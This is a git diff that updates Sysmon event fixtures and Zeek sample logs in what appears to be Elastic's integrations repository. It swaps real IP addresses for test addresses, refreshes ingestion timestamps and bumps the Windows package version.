UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2021-02-25 14:43:23.550\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{9497d8d9-b78b-6037-6f13-000000001000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2628\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Git\\mingw64\\libexec\\git-core\\git.exe\u003c/Data\u003e\u003cData Name='Type'\u003eImage is replaced\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21376,7 +21104,7 @@ ] }, "event": { - "ingested": "2021-06-14T13:23:14.742720400Z", + "ingested": "2021-12-09T13:50:23.457733500Z", "code": "23", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e23\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e23\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-12T06:48:27.084044200Z'/\u003e\u003cEventRecordID\u003e2243\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='1188' ThreadID='1600'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-12 06:48:27.084\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-4664-5eba-91ae-000000000000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e820\u003c/Data\u003e\u003cData Name='User'\u003eNT AUTHORITY\\SYSTEM\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\system32\\svchost.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Windows\\System32\\LogFiles\\Scm\\8b34f644-f627-47e7-98e0-957ba1c5eb6d\u003c/Data\u003e\u003cData Name='Hashes'\u003eMD5=5A9BDDF83BE530B481F0FD24DB28A6FF,IMPHASH=00000000000000000000000000000000\u003c/Data\u003e\u003cData Name='IsExecutable'\u003efalse\u003c/Data\u003e\u003cData Name='Archived'\u003etrue\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21470,7 +21198,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.742728900Z", + "ingested": "2021-12-09T13:50:23.457739300Z", "code": "7", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e7\u003c/EventID\u003e\u003cVersion\u003e3\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e7\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-10-28T02:39:26.388325200Z'/\u003e\u003cEventRecordID\u003e10685\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='1676' ThreadID='4796'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-10-28 02:39:26.374\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{9f32b55f-d9de-5f98-f006-000000000600}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e5184\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\System32\\dllhost.exe\u003c/Data\u003e\u003cData Name='ImageLoaded'\u003eC:\\Windows\\System32\\IDStore.dll\u003c/Data\u003e\u003cData Name='FileVersion'\u003e10.0.17763.1 (WinBuild.160101.0800)\u003c/Data\u003e\u003cData Name='Description'\u003eIdentity Store\u003c/Data\u003e\u003cData Name='Product'\u003eMicrosoft« Windows« Operating System\u003c/Data\u003e\u003cData Name='Company'\u003eMicrosoft Corporation\u003c/Data\u003e\u003cData Name='OriginalFileName'\u003eIdStore.dll\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA1=9955A1C071C44A7CEECC0D928A9CFB7F64CC3F93,MD5=C7C45610F644906E6F7D664EF2E45B08,SHA256=4808F1101F4E42387D8DDB7A355668BAE3BF6F781C42D3BCD82E23446B1DEB3E,IMPHASH=194F3797B52231028C718B6D776C6853\u003c/Data\u003e\u003cData Name='Signed'\u003etrue\u003c/Data\u003e\u003cData Name='Signature'\u003eMicrosoft Windows\u003c/Data\u003e\u003cData Name='SignatureStatus'\u003eValid\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21530,7 +21258,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.742737300Z", + "ingested": "2021-12-09T13:50:23.457745100Z", "code": "13", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e13\u003c/EventID\u003e\u003cVersion\u003e2\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e13\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2020-05-05T14:57:46.818869100Z'/\u003e\u003cEventRecordID\u003e2691\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='5496' ThreadID='876'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='EventType'\u003eSetValue\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2020-05-05 14:57:46.808\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{5b522f6e-7554-5eb1-6d00-000000000800}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e4320\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Windows\\Explorer.EXE\u003c/Data\u003e\u003cData Name='TargetObject'\u003eHKU\\S-1-5-21-1067164964-2079179834-2367582738-1000\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\UserAssist\\{CEBFF5CD-ACE2-4F4F-9178-9926F41749EA}\\Count\\HRZR_PGYFRFFVBA\u003c/Data\u003e\u003cData Name='Details'\u003eBinary Data\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21602,7 +21330,7 @@ "name": "DESKTOP-I9CQVAQ" }, "event": { - "ingested": "2021-06-14T13:23:14.742745900Z", + "ingested": "2021-12-09T13:50:23.457751Z", "code": "24", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e24\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e24\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2021-02-25T15:04:48.607343500Z'/\u003e\u003cEventRecordID\u003e10757412\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='3800' ThreadID='6444'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003eDESKTOP-I9CQVAQ\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e-\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2021-02-25 15:04:48.592\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{9497d8d9-aa1b-602f-a600-000000001000}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e2144\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\VMware\\VMware Tools\\vmtoolsd.exe\u003c/Data\u003e\u003cData Name='Session'\u003e1\u003c/Data\u003e\u003cData Name='ClientInfo'\u003euser: DESKTOP-I9CQVAQ\\luks\u003c/Data\u003e\u003cData Name='Hashes'\u003eSHA256=7ADB1CF1A75973079C055F929573AE92557A8C0E5B0E38A6A5427E412FB73D59,IMPHASH=00000000000000000000000000000000\u003c/Data\u003e\u003cData Name='Archived'\u003etrue\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21660,7 +21388,7 @@ "level": "information" }, "event": { - "ingested": "2021-06-14T13:23:14.742754400Z", + "ingested": "2021-12-09T13:50:23.457756700Z", "code": "2", "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e2\u003c/EventID\u003e\u003cVersion\u003e4\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e2\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-03-18T16:57:52.433367300Z'/\u003e\u003cEventRecordID\u003e32\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='4860' ThreadID='4516'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2012-r2\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-03-18 16:57:52.433\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{42f11c3b-ccaa-5c8f-0000-0010b4e22700}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e1600\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe\u003c/Data\u003e\u003cData Name='TargetFilename'\u003eC:\\Users\\vagrant\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Storage\\ext\\gfdkimpbcpahaombhbimeihdjnejgicl\\def\\ee4a6e45-bffd-49f4-98ae-32aebcc890b5.tmp\u003c/Data\u003e\u003cData Name='CreationUtcTime'\u003e2019-03-18 16:52:05.339\u003c/Data\u003e\u003cData Name='PreviousCreationUtcTime'\u003e2019-03-18 16:57:52.417\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", @@ -21728,11 +21456,11 @@ "type": "CNAME" }, { - "data": "40.121.17.79", + "data": "89.160.20.156", "type": "A" }, { - "data": "192.5.6.30", + "data": "192.168.6.30", "type": "A" }, { @@ -21740,7 +21468,7 @@ "type": "AAAA" }, { - "data": "192.33.14.30", + "data": "192.168.14.30", "type": "A" }, { @@ -21748,7 +21476,7 @@ "type": "AAAA" }, { - "data": "192.26.92.30", + "data": "192.168.92.30", "type": "A" }, { @@ -21757,12 +21485,12 @@ } ], "resolved_ip": [ - "40.121.17.79", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30" ] }, @@ -21780,19 +21508,19 @@ "c.urs.microsoft.com" ], "ip": [ - "40.121.17.79", - "192.5.6.30", + "89.160.20.156", + "192.168.6.30", "2001:503:a83e::2:30", - "192.33.14.30", + "192.168.14.30", "2001:503:231d::2:30", - "192.26.92.30", + "192.168.92.30", "2001:503:83eb::30" ] }, "event": { - "ingested": "2021-06-14T13:23:14.742763100Z", + "ingested": "2021-12-09T13:50:23.457762300Z", "code": "22", - "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:49:52.105632700Z'/\u003e\u003cEventRecordID\u003e234\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:49:51.154\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.urs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:40.121.17.79;192.5.6.30;2001:503:a83e::2:30;192.33.14.30;2001:503:231d::2:30;192.26.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", + "original": "\u003cEvent xmlns='http://schemas.microsoft.com/win/2004/08/events/event'\u003e\u003cSystem\u003e\u003cProvider Name='Microsoft-Windows-Sysmon' Guid='{5770385f-c22a-43e0-bf4c-06f5698ffbd9}'/\u003e\u003cEventID\u003e22\u003c/EventID\u003e\u003cVersion\u003e5\u003c/Version\u003e\u003cLevel\u003e4\u003c/Level\u003e\u003cTask\u003e22\u003c/Task\u003e\u003cOpcode\u003e0\u003c/Opcode\u003e\u003cKeywords\u003e0x8000000000000000\u003c/Keywords\u003e\u003cTimeCreated SystemTime='2019-07-18T03:49:52.105632700Z'/\u003e\u003cEventRecordID\u003e234\u003c/EventRecordID\u003e\u003cCorrelation/\u003e\u003cExecution ProcessID='2828' ThreadID='1684'/\u003e\u003cChannel\u003eMicrosoft-Windows-Sysmon/Operational\u003c/Channel\u003e\u003cComputer\u003evagrant-2016\u003c/Computer\u003e\u003cSecurity UserID='S-1-5-18'/\u003e\u003c/System\u003e\u003cEventData\u003e\u003cData Name='RuleName'\u003e\u003c/Data\u003e\u003cData Name='UtcTime'\u003e2019-07-18 03:49:51.154\u003c/Data\u003e\u003cData Name='ProcessGuid'\u003e{fa4a0de6-e8a8-5d2f-0000-001094619900}\u003c/Data\u003e\u003cData Name='ProcessId'\u003e356\u003c/Data\u003e\u003cData Name='QueryName'\u003ec.urs.microsoft.com\u003c/Data\u003e\u003cData Name='QueryStatus'\u003e0\u003c/Data\u003e\u003cData Name='QueryResults'\u003etype: 5 wd-prod-ss.trafficmanager.net;type: 5 wd-prod-ss-us-east-1-fe.eastus.cloudapp.azure.com;::ffff:89.160.20.156;192.168.6.30;2001:503:a83e::2:30;192.168.14.30;2001:503:231d::2:30;192.168.92.30;2001:503:83eb::30;\u003c/Data\u003e\u003cData Name='Image'\u003eC:\\Program Files\\Internet Explorer\\iexplore.exe\u003c/Data\u003e\u003c/EventData\u003e\u003c/Event\u003e", "provider": "Microsoft-Windows-Sysmon", "kind": "event", "created": "2019-07-18T03:49:52.105Z", diff --git a/packages/windows/manifest.yml b/packages/windows/manifest.yml index 8d8c3c9c742..4454c18715d 100644 --- a/packages/windows/manifest.yml +++ b/packages/windows/manifest.yml @@ -1,6 +1,6 @@ name: windows title: Windows -version: 1.5.0 +version: 1.5.1 description: Collect logs and metrics from Windows OS and services with Elastic Agent. type: integration categories: diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/conn.log b/packages/zeek/_dev/deploy/docker/sample_logs/conn.log index c0c61bc98bf..74d3721e8f0 100644 --- a/packages/zeek/_dev/deploy/docker/sample_logs/conn.log +++ b/packages/zeek/_dev/deploy/docker/sample_logs/conn.log @@ -1,11 +1,11 @@ {"ts":1547188415.857497,"uid":"CAcJw21BbVedgFnYH3","id.orig_h":"192.168.86.167","id.orig_p":38339,"id.resp_h":"192.168.86.1","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":true,"local_resp":true,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]} -{"ts":1547188416.857497,"uid":"CAcJw21BbVedgFnYH4","id.orig_h":"192.168.86.167","id.orig_p":38340,"id.resp_h":"8.8.8.8","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]} -{"ts":1547188417.857497,"uid":"CAcJw21BbVedgFnYH5","id.orig_h":"4.4.2.2","id.orig_p":38341,"id.resp_h":"8.8.8.8","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":false,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]} -{"ts":1551399000.57855,"uid":"Cc6NJ3GRlfjE44I3h","id.orig_h":"192.0.2.205","id.orig_p":3,"id.resp_h":"198.51.100.249","id.resp_p":3,"proto":"icmp","conn_state":"OTH","local_orig":false,"local_resp":false,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":107,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[]} -{"ts":1617062400.404645,"uid":"CCicIg43lOtCQOxXnb","id.orig_h":"10.156.0.2","id.orig_p":56190,"id.resp_h":"46.101.87.151","id.resp_p":443,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0} -{"ts":1617062100.419397,"uid":"C52mXBCPJ4pPGkhr1","id.orig_h":"10.156.0.2","id.orig_p":60810,"id.resp_h":"20.190.160.73","id.resp_p":443,"proto":"tcp","duration":0.10370898246765137,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267} -{"ts":1617062100.419603,"uid":"CTzCky2CyLT5JJvHck","id.orig_h":"10.156.0.2","id.orig_p":60804,"id.resp_h":"20.190.160.73","id.resp_p":443,"proto":"tcp","duration":0.10412883758544922,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267} -{"ts":1617062100.419826,"uid":"CIkS28PDxqQnN49m2","id.orig_h":"10.156.0.2","id.orig_p":60802,"id.resp_h":"20.190.160.73","id.resp_p":443,"proto":"tcp","duration":0.10433387756347656,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267} +{"ts":1547188416.857497,"uid":"CAcJw21BbVedgFnYH4","id.orig_h":"192.168.86.167","id.orig_p":38340,"id.resp_h":"89.160.20.156","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]} +{"ts":1547188417.857497,"uid":"CAcJw21BbVedgFnYH5","id.orig_h":"89.160.20.156","id.orig_p":38341,"id.resp_h":"89.160.20.156","id.resp_p":53,"proto":"udp","service":"dns","duration":0.076967,"orig_bytes":75,"resp_bytes":178,"conn_state":"SF","local_orig":false,"local_resp":false,"missed_bytes":0,"history":"Dd","orig_pkts":1,"orig_ip_bytes":103,"resp_pkts":1,"resp_ip_bytes":206,"tunnel_parents":[]} +{"ts":1551399000.57855,"uid":"Cc6NJ3GRlfjE44I3h","id.orig_h":"192.168.2.205","id.orig_p":3,"id.resp_h":"89.160.20.156","id.resp_p":3,"proto":"icmp","conn_state":"OTH","local_orig":false,"local_resp":false,"missed_bytes":0,"orig_pkts":1,"orig_ip_bytes":107,"resp_pkts":0,"resp_ip_bytes":0,"tunnel_parents":[]} +{"ts":1617062400.404645,"uid":"CCicIg43lOtCQOxXnb","id.orig_h":"10.156.0.2","id.orig_p":56190,"id.resp_h":"89.160.20.156","id.resp_p":443,"proto":"tcp","conn_state":"OTH","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"C","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":0,"resp_ip_bytes":0} +{"ts":1617062100.419397,"uid":"C52mXBCPJ4pPGkhr1","id.orig_h":"10.156.0.2","id.orig_p":60810,"id.resp_h":"89.160.20.156","id.resp_p":443,"proto":"tcp","duration":0.10370898246765137,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267} +{"ts":1617062100.419603,"uid":"CTzCky2CyLT5JJvHck","id.orig_h":"10.156.0.2","id.orig_p":60804,"id.resp_h":"89.160.20.156","id.resp_p":443,"proto":"tcp","duration":0.10412883758544922,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267} +{"ts":1617062100.419826,"uid":"CIkS28PDxqQnN49m2","id.orig_h":"10.156.0.2","id.orig_p":60802,"id.resp_h":"89.160.20.156","id.resp_p":443,"proto":"tcp","duration":0.10433387756347656,"orig_bytes":0,"resp_bytes":5854,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"^hCcdafA","orig_pkts":1,"orig_ip_bytes":52,"resp_pkts":4,"resp_ip_bytes":267} {"ts":1617062390.563187,"uid":"CezEGe4jeLNkayV976","id.orig_h":"10.156.0.2","id.orig_p":38948,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","service":"dns","duration":0.02680206298828125,"orig_bytes":0,"resp_bytes":241,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Cd","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":269} {"ts":1617062390.563442,"uid":"CKSr3w18mmW6t7bXC4","id.orig_h":"10.156.0.2","id.orig_p":40080,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","service":"dns","duration":0.025056123733520509,"orig_bytes":0,"resp_bytes":276,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Cd","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":304} {"ts":1617062390.667048,"uid":"CGUiHy4kLIF2ml95eg","id.orig_h":"10.156.0.2","id.orig_p":41407,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","service":"dns","duration":0.003319978713989258,"orig_bytes":0,"resp_bytes":133,"conn_state":"SHR","local_orig":true,"local_resp":false,"missed_bytes":0,"history":"Cd","orig_pkts":0,"orig_ip_bytes":0,"resp_pkts":1,"resp_ip_bytes":161} diff --git a/packages/zeek/_dev/deploy/docker/sample_logs/dns.log b/packages/zeek/_dev/deploy/docker/sample_logs/dns.log index c158d3fac18..01a26e3067a 100644 --- a/packages/zeek/_dev/deploy/docker/sample_logs/dns.log +++ b/packages/zeek/_dev/deploy/docker/sample_logs/dns.log @@ -1,9 +1,9 @@ -{"ts":1547188415.857497,"uid":"CAcJw21BbVedgFnYH3","id.orig_h":"192.168.86.167","id.orig_p":38339,"id.resp_h":"192.168.86.1","id.resp_p":53,"proto":"udp","trans_id":15209,"rtt":0.076967,"query":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":true,"RA":true,"Z":0,"answers":["proxy-production-us-west1.gcp.cloud.es.io","proxy-production-us-west1-v1-009.gcp.cloud.es.io","35.199.178.4"],"TTLs":[119.0,119.0,59.0],"rejected":false} +{"ts":1547188415.857497,"uid":"CAcJw21BbVedgFnYH3","id.orig_h":"192.168.86.167","id.orig_p":38339,"id.resp_h":"192.168.86.1","id.resp_p":53,"proto":"udp","trans_id":15209,"rtt":0.076967,"query":"dd625ffb4fc54735b281862aa1cd6cd4.us-west1.gcp.cloud.es.io","qclass":1,"qclass_name":"C_INTERNET","qtype":1,"qtype_name":"A","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":true,"RA":true,"Z":0,"answers":["proxy-production-us-west1.gcp.cloud.es.io","proxy-production-us-west1-v1-009.gcp.cloud.es.io","89.160.20.156"],"TTLs":[119.0,119.0,59.0],"rejected":false} {"ts":1567095830.680046,"uid":"C19a1k4lTv46YMbeOk","id.orig_h":"fe80::4ef:15cf:769f:ff21","id.orig_p":5353,"id.resp_h":"ff02::fb","id.resp_p":5353,"proto":"udp","trans_id":0,"query":"_googlecast._tcp.local","qclass":1,"qclass_name":"C_INTERNET","qtype":12,"qtype_name":"PTR","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} {"ts":1567095830.734329,"uid":"CdiVAw7jJw6gsX5H","id.orig_h":"192.168.86.237","id.orig_p":5353,"id.resp_h":"224.0.0.251","id.resp_p":5353,"proto":"udp","trans_id":0,"query":"_googlecast._tcp.local","rcode":0,"rcode_name":"NOERROR","AA":true,"TC":false,"RD":false,"RA":false,"Z":0,"answers":["bravia-4k-gb-5c89f865c9d569ab338815b35e3acc56._googlecast._tcp.local"],"TTLs":[120.0],"rejected":false} {"ts":1617105597.020685,"uid":"C7NcBd1QRK1mrqmaQe","id.orig_h":"10.156.0.2","id.orig_p":40091,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":58530,"query":"manage.office.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["manage.office.com.trafficmanager.net","o365adtapiproddeu001.cloudapp.net"],"TTLs":[8.0,13.0],"rejected":false} -{"ts":1617105597.020637,"uid":"CXzjOC13LkKzr4a80e","id.orig_h":"10.156.0.2","id.orig_p":38190,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":55540,"query":"manage.office.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["manage.office.com.trafficmanager.net","o365adtapiproddeu001.cloudapp.net","51.116.158.62"],"TTLs":[293.0,28.0,8.0],"rejected":false} +{"ts":1617105597.020637,"uid":"CXzjOC13LkKzr4a80e","id.orig_h":"10.156.0.2","id.orig_p":38190,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":55540,"query":"manage.office.com","rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":true,"Z":0,"answers":["manage.office.com.trafficmanager.net","o365adtapiproddeu001.cloudapp.net","89.160.20.156"],"TTLs":[293.0,28.0,8.0],"rejected":false} {"ts":1617105597.390017,"uid":"CkQ7DU1qCEGKL5xgg6","id.orig_h":"10.156.0.2","id.orig_p":42609,"id.resp_h":"169.254.169.254","id.resp_p":53,"proto":"udp","trans_id":23824,"rcode":0,"rcode_name":"NOERROR","AA":false,"TC":false,"RD":false,"RA":false,"Z":0,"rejected":false} 